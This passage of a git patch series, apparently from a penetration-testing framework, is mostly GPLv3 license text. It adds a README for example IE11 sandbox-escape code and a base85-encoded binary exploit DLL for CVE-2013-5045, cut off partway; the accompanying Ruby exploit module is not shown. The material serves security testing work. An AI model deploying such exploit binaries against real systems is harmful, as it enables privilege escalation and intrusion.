are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU Affero General Public License. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU Affero General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the special requirements of the GNU Affero General Public License, +section 13, concerning interaction through a network will apply to the +combination as such. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + {one line to give the program's name and a brief idea of what it does.} + Copyright (C) {year} {name of author} + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If the program does terminal interaction, make it output a short +notice like this when it starts in an interactive mode: + + {project} Copyright (C) {year} {fullname} + This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, your program's commands +might be different; for a GUI interface, you would use an "about box". + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU GPL, see +<http://www.gnu.org/licenses/>. + + The GNU General Public License does not permit incorporating your program +into proprietary programs. If your program is a subroutine library, you +may consider it more useful to permit linking proprietary applications with +the library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. But first, please read +<http://www.gnu.org/philosophy/why-not-lgpl.html>. \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/README.md b/external/source/exploits/IE11SandboxEscapes/README.md new file mode 100755 index 0000000000..a51ddd8491 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/README.md @@ -0,0 +1,10 @@ +IE11SandboxEscapes +================== + +Some example source code for fixed IE11 sandbox escapes. + +(c) James Forshaw 2014 + +For information purposes only. + +All files are licensed under GPLv3. See LICENSE for more information. \ No newline at end of file From 6e122e683a804ec5ef8ff6a8cce0f7cccd5d0c61 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 11:42:54 -0500 Subject: [PATCH 403/853] Add module for CVE-2013-5045 --- data/exploits/CVE-2013-5045/CVE-2013-5045.dll | Bin 0 -> 166400 bytes .../local/ms13_097_ie_registry_symlink.rb | 141 ++++++++++++++++++ 2 files changed, 141 insertions(+) create mode 100755 data/exploits/CVE-2013-5045/CVE-2013-5045.dll create mode 100644 modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb diff --git a/data/exploits/CVE-2013-5045/CVE-2013-5045.dll b/data/exploits/CVE-2013-5045/CVE-2013-5045.dll new file mode 100755 index 0000000000000000000000000000000000000000..3f912623885f6490ea79e3470401177a66f4418e GIT binary patch literal 166400 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 